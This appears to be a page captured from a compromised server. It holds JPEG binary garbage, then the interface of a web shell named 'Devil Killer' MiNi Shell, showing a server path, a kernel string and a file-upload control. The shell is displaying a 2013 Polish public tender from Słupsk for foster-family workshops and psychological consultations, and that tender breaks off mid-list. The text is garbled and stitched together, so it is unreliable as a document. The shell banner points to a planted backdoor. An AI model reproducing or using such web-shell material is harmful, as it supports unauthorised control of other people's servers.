JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/34242-N-2013.html

<p class="kh_header"><b>Słupsk: Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć warsztatowych i szkoleniowych dla: wychowanków rodzin zastępczych, rodziców zastępczych oraz  osób niepełnosprawnych, pochodzących z terenu powiatu słupskiego - uczestników projektu systemowego pn. Wyższe kwalifikacje zawodowe - większe możliwości na rynku pracy, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Słupsku w ramach poddziałania 7.1.2 Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 34242 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , Al. Sienkiewicza 20, 76-200 Słupsk, woj. pomorskie, tel. 59 8414311, faks 59 841 0196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcpr.slupsk.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć warsztatowych i szkoleniowych dla: wychowanków rodzin zastępczych, rodziców zastępczych oraz  osób niepełnosprawnych, pochodzących z terenu powiatu słupskiego - uczestników projektu systemowego pn. Wyższe kwalifikacje zawodowe - większe możliwości na rynku pracy, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Słupsku w ramach poddziałania 7.1.2 Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie poprzez różne formy wsparcia w poniższych zakresach tematycznych:
Część I - Warsztat kompetencji społecznych
1.	Grupa docelowa: Warsztat jest skierowany do 12 wychowanków rodzin zastępczych w wieku 15 - 25 lat.
2.	Celem warsztatu jest wzrost kompetencji społecznych uczestników, tj. nabycie umiejętności zachowania asertywnego, poprawa komunikacji interpersonalnej i zweryfikowanie u uczestników wiedzy na temat roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci oraz możliwości rozwiązywania konfliktów rodzinnych oraz integracja uczestników.
3.	Zakres tematyczny: trening integracyjny, asertywność, komunikacja interpersonalna, rola kobiety i mężczyzny w rodzinie. Zamówienie realizowane będzie w jednej grupie 12- osobowej w łącznej w ilości 12 godzin dydaktycznych (4 spotkania po 3 godziny dydaktyczne), w tym 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: dyskusja, ćwiczenia, gry, itp. 
4.	Termin realizacji części I - do 31 marca 2013 r. spotkania będą odbywały się w dni robocze od poniedziałku do piątku w godzinach popołudniowych, 4 spotkania po 3 godziny dydaktyczne (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
5.	Miejsce realizacji zamówienia:  siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20. Zamawiający zapewnienia salę szkoleniową, materiały piśmiennicze dla uczestników/czek, poczęstunek dla uczestników/czek projektu, zwrot kosztów dojazdu uczestnikom/czkom na zajęcia. Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę (wykaz materiałów papierniczych i piśmienniczych musi zostać zaakceptowany przez zamawiającego).
6.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
3)	zapewnienia niezbędnych akcesoriów do przeprowadzenia zajęć,
4)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
5)	przygotowania konspektów zajęć warsztatowych, prowadzenia dziennika zajęć wraz z listą obecności, pokwitowania odbioru materiałów szkoleniowych,
6)	przygotowania i przeprowadzenia z uczestnikami  ankiet początkowych (w pierwszym dniu zajęć) i ankiet końcowych (w ostatnim dniu zajęć) badających kompetencje społeczne uczestników (w tym z zakresu asertywności, komunikacji interpersonalnej, wiedzy nt. roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci, rozwiązywania problemów) oraz sporządzenia analizy tych ankiet,
7)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.
	
Część II - warsztat integracyjno- animacyjny
1.	Grupa docelowa: Warsztat skierowany jest do 16 rodziców zastępczych oraz ich wychowanków.
2.	Cel warsztatu: budowanie właściwych relacji pomiędzy rodzicami zastępczymi a wychowankami, poprawa relacji  rodziców/opiekunów z dziećmi,  przełamanie między nimi barier, pogłębienie więzi emocjonalnych, budowa wzajemnego zaufania, poprawa komunikacji, nauka organizacji i zarządzania czasem, możliwość stworzenia odpowiednich warunków do wymiany doświadczeń między rodzicami zastępczymi. 
3.	Zakres tematyczny: integracja, komunikacja w rodzinie, sposoby nawiązywania kontaktów w rodzinie poprzez grę i animację. Zamówienie realizowane będzie w jednej grupie 16 rodziców zastępczych i ich wychowanków w formie wyjazdowej do Sierakowa Sławieńskiego - Wioska Hobbitów na jeden dzień, gdzie przeprowadzone zostaną warsztaty integracyjno - animacyjne, tj. gry i zabawy animacyjne, w tym zajęcia zabawy z chustą Klanzy. zabawy z animatorami, gra terenowa. Przewiduje się, iż udział w wyjeździe weźmie nie więcej niż 50 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia.
4.	Termin realizacji części II - do dnia 30 kwietnia 2013r., realizacja zamówienia w ciągu jednego dnia -  sobota,  w terminie od 7 do 30 kwietnia 2013 r., co oznacza, że najszybszy termin wyjazdu planuje się na dzień 7 kwietnia 2013r. (dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy). 
5.	Czas pobytu w Wiosce Hobbitów w Sierakowie Sławieńskim - od godziny 10.00 do godziny 16.00, w tym 6 godzin dydaktycznych zajęć integracyjno - animacyjnych, dwie przerwy 15 - minutowe i jedna przerwa obiadowa.
6.	Miejsce realizacji zamówienia: Sierakowo Sławieńskie Wioska Hobbitów  (poniesienie kosztów związanych z dojazdem wszystkich uczestników warsztatu do Sierakowa Sławieńskiego oraz kosztów wyżywienia uczestników warsztatu leży po stronie Zamawiającego). 
7.	Wykonawca zobowiązany jest do: 
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	przeprowadzenia warsztatu integracyjno-animacyjnego obejmującego 6 godzin dydaktycznych za pomocą  gier i zabaw animacyjnych spełniających cele dydaktyczne i wpływających na uzyskanie ww. celów (integracja, przełamanie barier), w tym m.in. zajęcia zabawy z chustą Klanzy, zabawy z animatorami, gra terenowa,
3)	zapewnienia materiałów i akcesoriów niezbędnych do przeprowadzenia ww. warsztatu, 
4)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatu zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013,

Część III - wyjazdowy warsztat aktywizacji społecznej
1.	Grupa docelowa: Warsztat jest skierowany do 8 osób niepełnosprawnych w wieku aktywności zawodowej.
2.	Celem warsztatu jest wzrost kompetencji życiowych i umiejętności społecznych poprzez: stworzenie warunków do usamodzielnienia się osób niepełnosprawnych, wzrost ich umiejętności poruszania się poza środowiskiem naturalnym, integrację grupy w celu przełamania barier i poprawy komunikacji, naukę organizacji i zarządzania czasem. 
3.	Zakres tematyczny: edukacja psychospołeczna prowadzona za pomocą technik dramowych, integracja, przełamanie barier, poprawa komunikacji, nauka organizacji i zarządzania czasem. Zamówienie realizowane będzie w łącznej ilości 12 godzin dydaktycznych  (3 dni: piątek, sobota, niedziela), z czego 80% czasu trwania warsztatu przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj. ćwiczeń twórczych, scenek rodzajowych, gier.
4.	Termin realizacji części III- do 31 marca 2013 r., zajęcia będą odbywały się podczas 1 wyjazdu weekendowego, w dniach: piątek, sobota, niedziela w następującym podziale czasowym: piątek- 3 godz. dydaktyczne w godz. od 15:30 do 18:00, w tym jedna przerwa 15 minutowa,  sobota- 6 godz. dydaktycznych w godz. od 10:00- 17:00, w tym dwie przerwy 15- minutowe i jedna 2-godzinna obiadowa,  niedziela- 3 godziny dydaktyczne, w tym jedna przerwa 15 minutowa (w godzinach od 10:00 do12:30).
5.	Miejsce realizacji zamówienia: Ośrodek wczasowy na terenie powiatu słupskiego (zapewnienie sali dydaktycznej, noclegu dla uczestników, wyżywienia i poczęstunku dla uczestników oraz poniesienie kosztów związanych z dojazdem uczestników do miejsca realizacji warsztatu leży po stronie Zamawiającego). Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę(wykaz materiałów papierniczych i piśmienniczych musi zostać zaakceptowany przez zamawiającego).
6.	Wykonawca zobowiązany jest do: 
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej,
3)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
4)	przygotowania konspektów zajęć warsztatowych, prowadzenia dziennika zajęć wraz z listą obecności, pokwitowania odbioru materiałów szkoleniowych,
5)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
6)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.

Część IV - warsztat Szkoła rodzica
1.	Grupa docelowa: Warsztat skierowany jest do 16 rodziców zastępczych oraz ich wychowanków (przewiduje się, iż udział w warsztacie weźmie nie więcej niż 50 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia
2.	Zamówienie realizowane będzie w dwóch etapach:
1)	I etap - część teoretyczna w ilości 15 godzin dydaktycznych (5 spotkań po 3 godz. Dydaktyczne).
termin realizacji I etapu szkoły rodzica: do 31 marca 2013r.- spotkania będą odbywały się w dni robocze od poniedziałku do piątku w godzinach od. 16:00 do godz. 18.30 (w tym jedna przerwa 15-minutowa) - dokładny terminarz zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy
2)	 II etap - 2-dniowy warsztat wyjazdowy w ilości 12 godzin dydaktycznych (zajęcia praktyczne), 
termin realizacji II etapu szkoły rodzica: do 30 kwietnia 2013r. - II etap zrealizowany w formie wyjazdu weekendowego (sobota - niedziela) w okresie od 01 kwietnia 2013 r. do 30 kwietnia 2013r. (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).

3.	Etap I szkoły rodzica: zajęcia teoretyczne
1)	Celem warsztatów jest wzrost kompetencji społecznych i wychowawczych uczestników, tj. poprawa komunikacji w rodzinie, nawiązanie głębszych relacji z dziećmi, nabycie umiejętności radzenia sobie ze stresem, uświadomienie uczestnikom istoty współpracy z rodziną biologiczną dziecka oraz właściwej roli kobiety i mężczyzny w rodzinie, rozwiązywania konfliktów rodzinnych i pokonywania trudności w sytuacjach kryzysowych, przekazywanie prawidłowych wzorców wychowawczych na dzieci i zasad dobrego wychowania z elementami savoir vivre.
2)	Zakres tematyczny: treningu z komunikacji w rodzinie,  metody radzenia sobie ze stresem, kryzysami w rodzinie, rozwiązywanie konfliktów w rodzinie, sposoby nawiązywania głębszych relacji z dziećmi, prawidłowe wzorce wychowawcze, zasady dobrego wychowania z elementami savoir vivre. Zamówienie realizowane będzie w łącznej ilości 15 godzin lekcyjnych (5 dni po 3 godz. lekcyjne), z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja itp.
3)	Miejsce realizacji etapu I szkoły rodzica: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, poczęstunku dla uczestników/czek oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego). Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę.
4)	Wykonawca zobowiązany jest do: 
a)	przeprowadzenia warsztatu zgodnie z umową,
b)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy  Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
c)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
d)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć, 
e)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
4.	Etap II szkoły rodzica: zajęcia praktyczne 
1)	Celem wyjazdu jest wzrost kompetencji społecznych i wychowawczych uczestników projektu poprzez wykorzystanie w ramach zajęć praktycznych wiedzy teoretycznej zdobytej w ramach I etapu warsztatu Szkoła rodzica. Celem II etapu jest wzmocnienie poczucia odpowiedzialności rodziców za sytuację życiową dzieci, zmiany stylu wychowania, zwrócenie uwagi na potrzeby i umiejętności dzieci poprzez trening umiejętności opiekuńczo-wychowawczych i społecznych poza miejscem zamieszkania w celu pogłębienia i ocieplenia relacji pomiędzy rodzicami zastępczymi i ich wychowankami.
2)	Zakres tematyczny: 100% zajęć warsztatowych prowadzonych na zasadzie praktycznego treningu umiejętności opiekuńczo- wychowawczych i społecznych, wzmocnienia więzi pomiędzy rodzicami i wychowankami w wyniku przeprowadzonych różnego rodzaju gier, zabaw, aktywnych metod pracy z grupą.
3)	Miejsce realizacji zamówienia: Ośrodek wczasowy na terenie powiatu słupskiego (Zamawiający zapewni uczestnikom projektu i wychowankom transport do miejsca realizacji zamówienia a następnie do miejsca zamieszkania, wyżywienie, nocleg i poczęstunek).
4)	Wykonawca zobowiązany jest do:
a)	przeprowadzenia warsztatu zgodnie z umową,
b)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy  Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
c)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
d)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Część V - indywidualne konsultacje psychologiczne
1.	Grupa docelowa: Indywidualnymi konsultacjami psychologicznymi objętych zostanie 30 rodziców zastępczych (zakłada się, że w przypadku pojawiającej się potrzeby ze strony rodziców zastępczych w konsultacjach udział mogą wziąć członkowie rodzin zastępczych).
2.	Cel konsultacji: systematyczne wsparcie w prawidłowym oddziaływaniu na wychowanków rodzin zastępczych, rozwiązywanie bieżących problemów.
3.	Zamówienie realizowane będzie w formie indywidualnych porad psychologicznych w łącznej ilości 180 godzin, tj. średnio 6 godz./ 1 rodzica zastępczego, wykorzystywanych przez rodziców zastępczych w zależności od ich indywidualnych potrzeb.
4.	Termin realizacji części V - od 1 marca do 30 listopada 2013 r. w godzinach i terminach indywidualnie dostosowywanych do potrzeb uczestników projektu, przy czym zakłada się, że konsultacje odbywać się będą systematycznie, tj. średnio 20 godzin w miesiącu.
5.	Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej oraz poniesienie kosztów związanych z dojazdem uczestników na indywidualne poradnictwo leży po stronie Zamawiającego).
6.	 Wykonawca zobowiązany jest do:
a)	przeprowadzenia indywidualnych porad psychologicznych w terminach uzgadnianych na bieżąco w trakcie trwania umowy z wyprzedzeniem co najmniej tygodniowym,
b)	prowadzenia dokumentacji przebiegu konsultacji indywidualne karty konsultacji,
c)	zapewnienia uczestnikom/czkom niezbędnych materiałów szkoleniowych (w tym 1 egzemplarz materiałów szkoleniowych do dokumentacji projektowej),
d)	sporządzenia indywidualnych opinii psychologicznych dotyczących kompetencji wychowawczych, kompetencji społecznych;
e)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności zamawiającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania - oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia - oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia - oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat kompetencji społecznych, posiadającą wykształcenie co najmniej magisterskie psychologiczne, posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych z udziałem młodzieży w wieku do 25 roku życia, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe z udziałem młodzieży w wieku do 25 roku życia.

Część II
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat integracyjno- animacyjny, posiadającą wykształcenie wyższe, posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych z zakresu integracji, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe z zakresu integracji.

Część III
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat aktywizacji społecznej, posiadającą  wykształcenie co najmniej magisterskie pedagogiczne oraz ukończony kurs z zakresu pracy z grupą technikami dramowymi, posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych zajęć grupowych za pomocą technik dramowych czyli przeprowadziła co najmniej trzy warsztaty/szkolenia dramowe lub jeden warsztat/szkolenie dramowe trwające min 3 dni.
Część IV
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat Szkoła rodzica posiadającą wykształcenie co najmniej magisterskie psychologiczne lub pedagogiczne, posiadającą od co najmniej 4 lat uprawnienia do wykonywania zawodu psychologa lub pedagoga, licząc do terminu do składania ofert i posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych dla rodziców/rodzin z zakresu kompetencji wychowawczych, czyli przeprowadziła co najmniej dwa warsztaty/szkolenia/inne tożsame zajęcia grupowe dla rodziców/rodzin z zakresu kompetencji wychowawczych. 

Część V
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi indywidualne konsultacje psychologiczne, posiadającą wykształcenie co najmniej magisterskie psychologiczne, posiadającą uprawnienia do wykonywania zawodu psychologa od co najmniej 4 lat licząc do terminu do składania ofert oraz posiadającą doświadczenie w prowadzenie indywidualnych konsultacji psychologicznych, czyli przeprowadziła co najmniej 30 godzin indywidualnych konsultacji psychologicznych z udziałem rodziców zastępczych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

